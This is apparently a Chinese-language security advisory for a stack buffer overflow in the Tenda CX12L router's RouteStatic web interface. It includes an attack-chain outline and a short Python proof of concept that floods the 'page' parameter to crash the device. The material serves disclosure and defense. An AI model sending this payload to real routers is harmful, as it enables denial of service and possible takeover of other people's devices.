CVE-2026-5686 CVSS 8.8 高危

CVE-2026-5686 Tenda CX12L路由器栈溢出漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5686

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda CX12L

漏洞概述

Tenda CX12L路由器16.03.53.12版本存在栈缓冲区溢出漏洞。攻击者利用/goform/RouteStatic接口中'page'参数处理不当的缺陷，通过发送恶意数据包可导致设备崩溃或远程代码执行。该漏洞需低权限认证且攻击复杂度低，对设备机密性、完整性和可用性构成严重威胁。

技术细节

该漏洞源于Tenda CX12L路由器Web管理服务对用户输入的校验机制缺失。具体而言，在/goform/RouteStatic接口处理请求时，fromRouteStatic函数直接通过拷贝操作将用户提交的'page'参数写入栈上的局部变量缓冲区，且未对输入长度进行边界检查。由于攻击向量为网络（AV:N）且所需权限为低（PR:L），攻击者可在获取低权限账户访问权限后，构造包含恶意Shellcode或特定跳转地址的超长Payload。当该Payload被发送至服务器端，会触发栈缓冲区溢出，覆盖函数返回地址及关键寄存器，从而劫持程序执行流。成功利用后，攻击者可绕过系统保护在设备上执行任意代码，导致设备被完全控制或服务中断。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别目标为Tenda CX12L路由器，并确定其固件版本为16.03.53.12。

STEP 2

获取权限

利用低权限账户或默认凭证登录路由器Web管理界面，满足CVSS中的PR:L要求。

STEP 3

漏洞利用

向/goform/RouteStatic接口发送POST请求，在'page'参数中填充超长恶意数据。

STEP 4

溢出触发

服务器端未过滤输入，将数据拷贝至栈缓冲区，导致溢出并覆盖返回地址。

STEP 5

代码执行

程序流程被劫持，跳转至攻击者注入的Shellcode，获取系统Root权限或造成DoS。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual IP)
target_url = "http://192.168.0.1/goform/RouteStatic"

# Vulnerable parameter: page
# Constructing a payload to trigger stack overflow
# 500 bytes of 'A' to exceed the buffer size
payload = {
    "page": "A" * 500
}

# Attacker requires low-privilege authentication (PR:L)
# Replace with valid cookies if necessary
cookies = {
    "Cookie": "user_cookie_here"
}

try:
    print("Sending exploit payload...")
    response = requests.post(target_url, data=payload, cookies=cookies, timeout=5)
    # If the device crashes, no response or error will be returned
    print(f"Response Status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Device likely crashed or connection refused: {e}")

影响范围

Tenda CX12L 16.03.53.12

防御指南

临时缓解措施

建议用户立即检查设备型号与固件版本，若受影响应尽快升级。在无法立即升级的情况下，应通过ACL规则限制对路由器管理界面的访问，仅允许信任的内网主机连接，并关闭不必要的服务端口以减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5686
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5686
3 Details https://www.cvedetails.com/cve/CVE-2026-5686/
4 VulDB https://vuldb.com/cve/CVE-2026-5686
5 Link https://github.com/cve-a/lvdan/issues/4
6 Link https://vuldb.com/submit/792783
7 Link https://vuldb.com/vuln/355513
8 Link https://vuldb.com/vuln/355513/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表